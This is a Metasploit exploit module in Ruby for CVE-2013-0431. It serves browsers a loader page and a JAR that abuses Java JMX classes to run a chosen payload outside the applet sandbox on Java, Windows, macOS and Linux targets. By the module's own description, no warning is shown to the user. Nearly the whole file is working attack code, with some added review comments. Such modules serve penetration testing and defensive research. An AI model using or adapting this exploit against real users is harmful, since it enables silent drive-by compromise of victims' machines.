##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
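# Browser-delivered Java applet module for CVE-2013-0431.
#
# The module runs a small HTTP server (via the HttpServer::HTML mixin) that
# serves two things: a loader page referencing an applet archive, and the
# archive itself, which bundles the pre-built class files from the module's
# data directory together with the selected payload.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  # include Msf::Exploit::Remote::BrowserAutopwn
  # autopwn_info({ :javascript => false })

  # Registers the module metadata (name, description, authorship, references,
  # supported platforms/targets and reliability notes) with the framework.
  #
  # @param info [Hash] metadata overrides supplied by the framework
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Java Applet JMX Remote Code Execution',
        'Description' => %q{
          This module abuses the JMX classes from a Java Applet to run arbitrary Java code
          outside of the sandbox as exploited in the wild in February of 2013. Additionally,
          this module bypasses default security settings introduced in Java 7 Update 10 to run
          unsigned applet without displaying any warning to the user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Unknown', # Vulnerability discovery and exploit in the wild
          'Adam Gowdiak', # Vulnerability discovery
          'SecurityObscurity', # Exploit analysis and deobfuscation
          'juan vazquez' # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2013-0431' ],
          [ 'OSVDB', '89613' ],
          [ 'BID', '57726' ],
          [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-8.pdf' ],
          [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-9.pdf' ],
          [ 'URL', 'http://security-obscurity.blogspot.com.es/2013/01/about-new-java-0-day-vulnerability.html' ],
          [ 'URL', 'http://pastebin.com/QWU1rqjf' ],
          [ 'URL', 'http://malware.dontneedcoffee.com/2013/02/cve-2013-0431-java-17-update-11.html' ]
        ],
        'Platform' => %w{java linux osx win},
        # Space/BadChars/DisableNops describe the payload constraints the
        # framework uses when encoding the payload into the archive.
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
        'Targets' => [
          [
            'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA,
            }
          ],
          [
            'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
            }
          ],
          [
            'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
          [
            'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2013-01-19',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Dispatches one HTTP request from the connected browser.
  #
  # A URI ending in ".jar" (case-insensitive) is answered with the applet
  # archive, a URI ending in "/" with the loader page, and anything else is
  # redirected to the resource root so the loader page is served next.
  # NOTE(review): both patterns use `$`, which in Ruby anchors at a line end
  # rather than the end of the string; `\z` would be the strict form.
  #
  # @param cli the connected client handle passed by the HttpServer mixin
  # @param request the parsed HTTP request (only #uri is consulted)
  # @return [void]
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      print_status("Sending JAR")
      send_response(cli, generate_jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      print_status("Sending HTML")
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      # Normalise any other path onto the resource root.
      send_redirect(cli, "#{get_resource}/", '')
    end
  end

  # Assembles the applet archive: the payload's own JAR plus the pre-built
  # class files shipped in the module's data directory.
  #
  # Each entry of +paths+ is a path split into components; any intermediate
  # directory of a nested entry is added to the archive before the file
  # itself, so the archive listing stays well-formed.
  #
  # @return [String] the packed JAR bytes
  def generate_jar
    paths = [
      [ "Exploit.ser" ],
      [ "Exploit.class" ],
      [ "B.class" ]
    ]

    # NOTE(review): `cli` is neither a parameter nor a local here, so this
    # resolves to whatever the included mixins expose under that name —
    # confirm against the HttpServer mixin.
    p = regenerate_payload(cli)
    jar = p.encoded_jar

    data_dir = File.join(Msf::Config.data_directory, "exploits", "cve-2013-0431")

    paths.each do |path|
      # Create each parent directory entry once, if the archive lacks it.
      1.upto(path.length - 1) do |depth|
        dir_entry = path[0, depth].join("/") + "/"
        jar.add_file(dir_entry, '') unless jar.entries.any? { |e| e.name == dir_entry }
      end

      # File.binread reads the whole file in binary mode and always releases
      # the descriptor; the previous open/read/close sequence leaked the
      # handle if the read raised.
      jar.add_file(path.join("/"), File.binread(File.join(data_dir, path)))
    end

    jar.pack
  end

  # Builds the loader page. Internet Explorer gets an <applet> tag, every
  # other browser an <embed> tag; both reference a randomly named ".jar"
  # so the follow-up request is matched by the ".jar" branch of
  # #on_request_uri. The name is generated once so both branches agree.
  #
  # @return [String] the HTML document
  def generate_html
    jar_name = "#{rand_text_alpha(4 + rand(4))}.jar"

    <<~EOF
      <html>
      <script language="Javascript">

      var _app = navigator.appName;

      if (_app == 'Microsoft Internet Explorer') {
        document.write('<applet archive="#{jar_name}" object="Exploit.ser"></applet>');
      } else {
        document.write('<embed object="Exploit.ser" type="application/x-java-applet;version=1.6" archive="#{jar_name}"></embed>');
      }

      </script>
      </html>
    EOF
  end
end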